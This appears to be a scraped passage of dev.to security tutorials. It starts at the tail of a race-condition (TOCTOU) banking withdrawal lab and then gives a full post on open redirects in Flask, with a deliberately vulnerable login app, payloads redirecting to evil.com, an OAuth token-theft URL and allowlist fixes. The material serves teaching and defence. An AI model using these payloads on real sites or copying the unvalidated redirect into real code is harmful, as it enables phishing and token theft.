class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="n">new_balance</span> <span class="c1"># Single write </span> <span class="n">tx</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">:</span> <span class="nf">len</span><span class="p">(</span><span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">])</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="sh">"</span><span class="s">type</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">debit</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">amount</span><span class="sh">"</span><span class="p">:</span> <span class="n">amount</span><span class="p">,</span> <span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">success</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">timestamp</span><span class="sh">"</span><span class="p">:</span> <span class="n">time</span><span class="p">.</span><span class="nf">strftime</span><span class="p">(</span><span class="sh">"</span><span class="s">%H:%M:%S</span><span class="sh">"</span><span class="p">)}</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">].</span><span class="nf">append</span><span class="p">(</span><span class="n">tx</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">success</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">withdrawn</span><span class="sh">"</span><span class="p">:</span> <span class="n">amount</span><span class="p">,</span> <span class="sh">"</span><span class="s">new_balance</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">],</span> <span class="sh">"</span><span class="s">transaction_id</span><span class="sh">"</span><span class="p">:</span> <span class="n">tx</span><span class="p">[</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">]}</span> </code></pre> </div> <p>Production gold: Wrap in DB transactions.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">BEGIN</span> <span class="n">TRANSACTION</span><span class="p">;</span> <span class="k">UPDATE</span> <span class="n">accounts</span> <span class="k">SET</span> <span class="n">balance</span> <span class="o">=</span> <span class="n">balance</span> <span class="o">-</span> <span class="mi">300</span> <span class="k">WHERE</span> <span class="n">id</span> <span class="o">=</span> <span class="mi">1</span> <span class="k">AND</span> <span class="n">balance</span> <span class="o">&gt;=</span> <span class="mi">300</span><span class="p">;</span> <span class="c1">-- If rows_affected == 0, rollback (insufficient funds)</span> <span class="k">COMMIT</span><span class="p">;</span> </code></pre> </div> <h2> Lab Screenshot </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tpzf9g12saphnt346gi.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tpzf9g12saphnt346gi.png" alt=" " width="800" height="373"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwdst2qi3u1xvhc6kk4o4.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwdst2qi3u1xvhc6kk4o4.png" alt=" " width="800" height="242"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgl7e6lctzr75omrpdrb4.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgl7e6lctzr75omrpdrb4.png" alt=" " width="800" height="276"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyw5uz413fhmmvwhe1wia.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyw5uz413fhmmvwhe1wia.png" alt=" " width="800" height="508"></a></p> <h2> Real-World Echoes &amp; Hunt Tips </h2> <ul> <li> <strong>Incidents</strong>: 2010s flash crashes from racey trades; 2021 Poly Network $600M crypto drain (races in bridges).</li> <li> <strong>Bounties</strong>: HackerOne pays big for TOCTOU in payments (e.g., $20K on Stripe clones).</li> <li> <strong>Pro Tip</strong>: Assume concurrency. Test with chaos engineering (e.g., Gremlin for delays).</li> </ul> <h2> Epilogue: Lessons from the Shadows </h2> <p>NovaPay's "heist" reminds us: Security is timing. Validate <em>and</em> act atomically, or adversaries will thread their way in. Locks for simplicity, atomics for speed, transactions for scale. Design for the storm — concurrent users are the norm.</p> <p>Reset your lab, swap in a fix, and re-attack. Does it hold? Tweak the sleep to 5s for drama. For extra polish:</p> <ul> <li> <strong>Visual Diagram</strong>: Mermaid timeline (code below — paste into mermaid.live).</li> <li> <strong>Burp Demo</strong>: Use Turbo Intruder with the exploit.py logic.</li> <li> <strong>Dockerize</strong>: Want a one-command CTF? Reply — I'll script it. </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>sequenceDiagram participant A as Attacker Threads participant S as Server (Shared Wallet) Note over A,S: t=0: All check balance=1000 A-&gt;&gt;S: if 1000 &gt;= 300? (x5) S--&gt;&gt;A: Yes (x5) Note over A,S: t=2s: Sequential deducts A-&gt;&gt;S: balance -=300 (Thread1) S--&gt;&gt;A: 700 A-&gt;&gt;S: balance -=300 (Thread2) S--&gt;&gt;A: 400 ... (continues to negative) </code></pre> </div> <p>This lab demonstrated a TOCTOU race condition in a banking withdrawal system.</p> <p>Multiple concurrent requests exploited a delay between balance verification and deduction.</p> <p>The attack allowed withdrawing more money than available.</p> <p>Mitigation requires atomic operations or synchronization mechanisms.</p> cybersecurity webdev programming python Day 20 — A Deep Dive into Open Redirect Vulnerabilities in Flask – From Exploitation to Ironclad Fixes Hafiz Shamnad Sun, 08 Mar 2026 05:05:23 +0000 https://forem.com/hafiz_shamnad/day-21-a-deep-dive-into-open-redirect-vulnerabilities-in-flask-from-exploitation-to-ironclad-2905 https://forem.com/hafiz_shamnad/day-21-a-deep-dive-into-open-redirect-vulnerabilities-in-flask-from-exploitation-to-ironclad-2905 <p>In the world of web security, vulnerabilities often lurk in the seemingly innocuous corners of your code—like a simple redirect that trusts user input a little too much. Open Redirects are one such "simple" issue, but their impact can ripple into phishing epidemics, credential theft, and OAuth hijackings. In this detailed writeup, we'll dissect the vulnerability step by step: what it is, why it happens in Flask apps, how attackers weaponize it, and—most importantly—how to fortify your code against it. I'll include expanded code examples, real-world attack vectors, and even a quick lab setup to test it yourself.</p> <p>If you're a developer dipping into security or a pentester honing your skills, this is your hands-on guide. Let's build, break, and bulletproof a Flask app together.</p> <h2> What is an Open Redirect Vulnerability? </h2> <p>At its core, an <strong>Open Redirect</strong> (also known as an unvalidated redirect) happens when a web application allows user-supplied input to dictate where a user gets redirected <em>without proper validation</em>. This input is typically passed via query parameters (e.g., <code>?next=...</code>), headers, or form data.</p> <h3> Why It's Dangerous </h3> <ul> <li> <strong>Phishing Superpower</strong>: Attackers craft links that masquerade as trusted (e.g., <code>https://yourbank.com/login?next=evil-phish-site.com</code>). Victims see the legit domain in their address bar, log in, and boom—redirected to a fake site harvesting credentials.</li> <li> <strong>Chained Attacks</strong>: It's a gateway drug for bigger exploits, like stealing OAuth tokens (e.g., tricking a user into authorizing a malicious app) or bypassing security filters (e.g., redirecting past login walls).</li> <li> <strong>Low Barrier to Entry</strong>: No fancy exploits needed—just social engineering and a URL shortener.</li> </ul> <p>According to OWASP, Open Redirects rank in the Top 10 for good reason: they're easy to find (via automated scanners like Burp Suite) and exploit, but often overlooked in code reviews.</p> <h3> Common Triggers in Web Apps </h3> <p>Redirects pop up everywhere: login "next" pages, error handlers, email verification links. In Flask, the <code>redirect()</code> function from <code>flask</code> is the usual suspect—it's convenient but naive if fed raw user input.</p> <h2> Building a Vulnerable Flask App: The Setup </h2> <p>Let's start by creating a minimal vulnerable app. I'll assume you're running Python 3.8+ with Flask installed (<code>pip install flask</code>). Save this as <code>vulnerable_app.py</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">redirect</span><span class="p">,</span> <span class="n">url_for</span><span class="p">,</span> <span class="n">render_template_string</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="c1"># Simple in-memory "users" for demo purposes </span><span class="n">USERS</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">password123</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">index</span><span class="p">():</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Welcome to the Vulnerable App! &lt;a href=</span><span class="sh">'</span><span class="s">/login?next=/dashboard</span><span class="sh">'</span><span class="s">&gt;Login&lt;/a&gt;</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/login</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">login</span><span class="p">():</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># Render a basic login form </span> <span class="k">return</span> <span class="nf">render_template_string</span><span class="p">(</span><span class="sh">"""</span><span class="s"> &lt;form method=</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="s">&gt; Username: &lt;input type=</span><span class="sh">"</span><span class="s">text</span><span class="sh">"</span><span class="s"> name=</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="s">&gt;&lt;br&gt; Password: &lt;input type=</span><span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="s"> name=</span><span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="s">&gt;&lt;br&gt; &lt;input type=</span><span class="sh">"</span><span class="s">submit</span><span class="sh">"</span><span class="s"> value=</span><span class="sh">"</span><span class="s">Login</span><span class="sh">"</span><span class="s">&gt; &lt;/form&gt; </span><span class="sh">"""</span><span class="p">)</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">)</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Dummy auth: always succeed for demo (NEVER DO THIS IN PROD!) </span> <span class="k">if</span> <span class="n">username</span> <span class="ow">in</span> <span class="n">USERS</span> <span class="ow">and</span> <span class="n">password</span> <span class="o">==</span> <span class="n">USERS</span><span class="p">[</span><span class="n">username</span><span class="p">]:</span> <span class="n">next_url</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">next</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Vulnerable: Trusts user input blindly </span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="n">next_url</span> <span class="ow">or</span> <span class="nf">url_for</span><span class="p">(</span><span class="sh">"</span><span class="s">dashboard</span><span class="sh">"</span><span class="p">))</span> <span class="k">else</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Invalid credentials. Try again.</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/dashboard</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">dashboard</span><span class="p">():</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Welcome to the Dashboard! You</span><span class="sh">'</span><span class="s">re logged in.</span><span class="sh">"</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">"</span><span class="s">__main__</span><span class="sh">"</span><span class="p">:</span> <span class="n">app</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">debug</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> </code></pre> </div> <p>Run it with <code>python vulnerable_app.py</code> and visit <code>http://localhost:5000</code>. Click the login link—after "logging in," it redirects to <code>/dashboard</code> harmlessly. But notice the <code>?next=</code> parameter? That's our entry point for chaos.</p> <h3> The Core Flaw Dissected </h3> <ul> <li> <code>request.args.get("next")</code> pulls the query param without sanitization.</li> <li> <code>redirect(next_url)</code> sends an HTTP 302 with <code>Location: &lt;user_input&gt;</code>, letting the browser follow anywhere.</li> <li>No checks for scheme (http/https), domain, or even if it's a URL at all.</li> </ul> <p>Pro tip: In production, always log redirects for auditing—Flask's logger can help: <code>app.logger.warning(f"Redirecting to: {next_url}")</code>.</p> <h2> Exploiting Open Redirect: Attack Vectors in Action </h2> <p>Exploitation is straightforward but sneaky. Attackers distribute the malicious link via email, SMS, or social media. Here's how it plays out.</p> <h3> Basic Exploitation </h3> <ol> <li> <strong>Craft the Payload</strong>: <code>http://localhost:5000/login?next=https://evil.com/phish</code> </li> <li> <strong>Victim Interaction</strong>: <ul> <li>Victim clicks → Sees legit login page (address bar shows <code>localhost:5000/login?...</code>).</li> <li>Enters creds → Submits form.</li> <li>Server responds with <code>Location: https://evil.com/phish</code> → Browser jumps there.</li> </ul> </li> <li> <strong>Attacker Wins</strong>: Victim is now on a phishing page that looks like your app, primed to steal more data.</li> </ol> <p>Test it: Swap <code>evil.com</code> for <code>https://example.com</code> (harmless) and watch the redirect in your browser's Network tab.</p> <h3> Advanced Scenarios </h3> <p>Open Redirects shine in combos. Let's explore:</p> <ol> <li> <p><strong>OAuth Token Theft</strong>:</p> <ul> <li>In apps using OAuth (e.g., "Login with Google"), the callback might redirect via <code>?redirect_uri=...</code>.</li> <li>Attacker: <code>yourapp.com/oauth/callback?redirect_uri=https://evil.com/steal-token</code>.</li> <li>Flow: User authorizes → Token sent to callback → Redirect leaks token to evil.com.</li> <li>Real-world: Facebook's 2018 OAuth bug let attackers steal access tokens this way.</li> </ul> </li> <li> <p><strong>Bypassing Content Security Policy (CSP)</strong>:</p> <ul> <li>CSP blocks inline scripts, but redirects can load external resources indirectly.</li> <li>Attacker embeds the open redirect in an iframe or link, smuggling malicious JS.</li> </ul> </li> <li> <p><strong>Phishing with URL Obfuscation</strong>:</p> <ul> <li>Use data URLs: <code>?next=javascript:alert('XSS!')</code> (if JS execution is allowed post-redirect).</li> <li>Or protocol-relative: <code>?next=//evil.com</code> (adapts to http/https seamlessly).</li> </ul> </li> <li> <p><strong>SSRF (Server-Side Request Forgery) Twist</strong>:</p> <ul> <li>If your redirect fetches the URL server-side (rare, but possible), it could probe internal networks.</li> </ul> </li> </ol> <p>To simulate: Use tools like <code>curl -v http://localhost:5000/login?next=https://evil.com -d "username=admin&amp;password=password123"</code> and inspect the <code>Location</code> header.</p> <h3> Detection Tools </h3> <ul> <li> <strong>Burp Suite/ZAP</strong>: Intercept requests and fuzz the <code>next</code> param.</li> <li> <strong>Nuclei/Yarn</strong>: Scan for open redirects with templates like <code>{{BaseURL}}/login?next=http://{{interactsh-url}}</code>.</li> </ul> <h2> Fixing It: From Basic to Battle-Hardened </h2> <p>The fix? <strong>Validate, validate, validate</strong>. Never redirect to untrusted turf. Here's an evolving approach.</p> <h3> Step 1: Basic Internal-Only Check </h3> <p>Use <code>urlparse</code> to whitelist your domain. Update the login route:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span> <span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">url_for</span> <span class="k">def</span> <span class="nf">is_safe_url</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">allowed_hosts</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">allowed_hosts</span><span class="p">:</span> <span class="n">allowed_hosts</span> <span class="o">=</span> <span class="p">{</span><span class="n">request</span><span class="p">.</span><span class="n">host</span><span class="p">}</span> <span class="c1"># e.g., 'localhost:5000' </span> <span class="k">if</span> <span class="ow">not</span> <span class="n">target</span><span class="p">:</span> <span class="k">return</span> <span class="bp">False</span> <span class="n">parsed</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">target</span> <span class="k">if</span> <span class="n">target</span><span class="p">.</span><span class="nf">startswith</span><span class="p">((</span><span class="sh">'</span><span class="s">http://</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">https://</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">/</span><span class="sh">'</span><span class="p">))</span> <span class="k">else</span> <span class="sa">f</span><span class="sh">"</span><span class="s">http://</span><span class="si">{</span><span class="n">target</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="n">parsed</span><span class="p">.</span><span class="n">netloc</span> <span class="ow">in</span> <span class="n">allowed_hosts</span> <span class="ow">or</span> <span class="n">parsed</span><span class="p">.</span><span class="n">netloc</span> <span class="o">==</span> <span class="sh">''</span> <span class="c1"># Relative paths OK </span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/login</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">login</span><span class="p">():</span> <span class="c1"># ... (auth logic same as before) </span> <span class="k">if</span> <span class="n">username</span> <span class="ow">in</span> <span class="n">USERS</span> <span class="ow">and</span> <span class="n">password</span> <span class="o">==</span> <span class="n">USERS</span><span class="p">[</span><span class="n">username</span><span class="p">]:</span> <span class="n">next_url</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">next</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="n">next_url</span> <span class="ow">and</span> <span class="nf">is_safe_url</span><span class="p">(</span><span class="n">next_url</span><span class="p">):</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="n">next_url</span><span class="p">)</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="nf">url_for</span><span class="p">(</span><span class="sh">"</span><span class="s">dashboard</span><span class="sh">"</span><span class="p">))</span> <span class="c1"># Fallback to safe internal page </span> <span class="c1"># ... (else clause) </span></code></pre> </div> <ul> <li> <strong>How it Works</strong>: Strips to netloc (domain:port). Relative URLs (e.g., <code>/dashboard</code>) parse to empty netloc—safe.</li> <li> <strong>Test</strong>: <code>?next=https://evil.com</code> → Blocked, falls back to dashboard. <code>?next=/profile</code> → Allowed.</li> </ul> <h3> Step 2: Advanced Whitelisting and Edge Cases </h3> <p>For production, level up:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">re</span> <span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span><span class="p">,</span> <span class="n">urljoin</span> <span class="k">def</span> <span class="nf">is_safe_url</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">base_url</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">url_root</span><span class="p">,</span> <span class="n">allowed_domains</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">allowed_domains</span><span class="p">:</span> <span class="n">allowed_domains</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">yourdomain.com</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">www.yourdomain.com</span><span class="sh">'</span><span class="p">]</span> <span class="c1"># Your allowlist </span> <span class="c1"># Reject non-URLs or suspicious schemes </span> <span class="k">if</span> <span class="ow">not</span> <span class="n">re</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="sa">r</span><span class="sh">'</span><span class="s">^https?://</span><span class="sh">'</span><span class="p">,</span> <span class="n">target</span><span class="p">)</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">target</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="sh">'</span><span class="s">/</span><span class="sh">'</span><span class="p">):</span> <span class="k">return</span> <span class="bp">False</span> <span class="n">parsed</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="c1"># Block javascript:, data:, etc. </span> <span class="k">if</span> <span class="n">parsed</span><span class="p">.</span><span class="n">scheme</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">(</span><span class="sh">'</span><span class="s">http</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">https</span><span class="sh">'</span><span class="p">):</span> <span class="k">return</span> <span class="bp">False</span> <span class="c1"># Relative URL? Resolve against base </span> <span class="k">if</span> <span class="n">parsed</span><span class="p">.</span><span class="n">netloc</span> <span class="o">==</span> <span class="sh">''</span><span class="p">:</span> <span class="n">target</span> <span class="o">=</span> <span class="nf">urljoin</span><span class="p">(</span><span class="n">base_url</span><span class="p">,</span> <span class="n">target</span><span class="p">)</span> <span class="n">parsed</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="c1"># Check domain </span> <span class="k">return</span> <span class="n">parsed</span><span class="p">.</span><span class="n">netloc</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sh">'</span><span class="s">www.</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="ow">in</span> <span class="n">allowed_domains</span> <span class="c1"># Normalize www. </span> <span class="c1"># In login route: </span><span class="n">next_url</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">next</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="n">next_url</span> <span class="ow">and</span> <span class="nf">is_safe_url</span><span class="p">(</span><span class="n">next_url</span><span class="p">):</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="n">next_url</span><span class="p">)</span> </code></pre> </div> <ul> <li> <strong>Extras</strong>: <ul> <li> <strong>Allowlist Over Denylist</strong>: Explicitly permit <code>yourdomain.com</code> variants.</li> <li> <strong>Scheme Enforcement</strong>: Force HTTPS to avoid downgrade attacks.</li> <li> <strong>Path Validation</strong>: Add <code>and '/admin' not in parsed.path</code> to block sensitive areas.</li> <li> <strong>Rate Limiting</strong>: Use Flask-Limiter on login to thwart brute-force link spam.</li> </ul> </li> </ul> <h3> Step 3: Framework Best Practices </h3> <ul> <li> <strong>Flask-Specific</strong>: Use <code>url_for()</code> for all internal links—it's safer than hardcoding.</li> <li> <strong>Session-Based Redirects</strong>: Store intended URL in session pre-login, retrieve post-auth (avoids query param altogether).</li> <li> <strong>HTTP Headers</strong>: Set <code>X-Frame-Options: DENY</code> and CSP to limit embedding.</li> <li> <strong>OWASP Cheat Sheet</strong>: Follow their <a href="https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html" rel="noopener noreferrer">Unvalidated Redirects</a> for more.</li> </ul> <h2> Real-World Examples and Lessons </h2> <ul> <li> <strong>Google (2014)</strong>: A <code>?continue=</code> param in Google Accounts allowed redirects to arbitrary sites, fixed via domain checks.</li> <li> <strong>Facebook (Ongoing)</strong>: Repeated OAuth redirect bugs led to token leaks; now they enforce strict <code>redirect_uri</code> validation.</li> <li> <strong>Stats</strong>: Veracode's 2023 report shows Open Redirects in 5% of scanned apps—low severity, but 20% lead to high-impact chains.</li> </ul> <p>Big takeaway: Even giants slip up. Audit your redirects with <code>grep -r "redirect(" .</code> in your codebase.</p> <h2> Hands-On Lab: Test and Tweak </h2> <ol> <li>Run the vulnerable app.</li> <li>Exploit with a phishing sim (use <code>http://httpbin.org/redirect/3</code> as "evil").</li> <li>Apply the fix, re-test.</li> <li>Bonus: Add WTForms for input validation or integrate with Flask-Security for auth. ## Result Screenshots</li> </ol> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsxmuert5hwvjho4g9vi.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsxmuert5hwvjho4g9vi.png" alt=" " width="800" height="417"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn4a16geylathnaky8wv9.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn4a16geylathnaky8wv9.png" alt=" " width="426" height="33"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tsqh2arse2438wot80s.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tsqh2arse2438wot80s.png" alt=" " width="414" height="544"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy0haavynsaevku9ncp12.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy0haavynsaevku9ncp12.png" alt=" " width="800" height="416"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosb7j6y1yo36a6p4eh2o.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosb7j6y1yo36a6p4eh2o.png" alt=" " width="594" height="133"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26ll1rhtdwfaq1n8yfp1.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26ll1rhtdwfaq1n8yfp1.png" alt=" " width="800" height="410"></a></p> <h2> Key Takeaways </h2> <ul> <li> <strong>Trust No Input</strong>: User data is a liar—always parse and validate.</li> <li> <strong>Layer Defenses</strong>: Basic checks + allowlists + logging = robust.</li> <li> <strong>Proactive Hunting</strong>: Scan early (e.g., via GitHub Actions with Semgrep).</li> <li> <strong>Learn by Breaking</strong>: 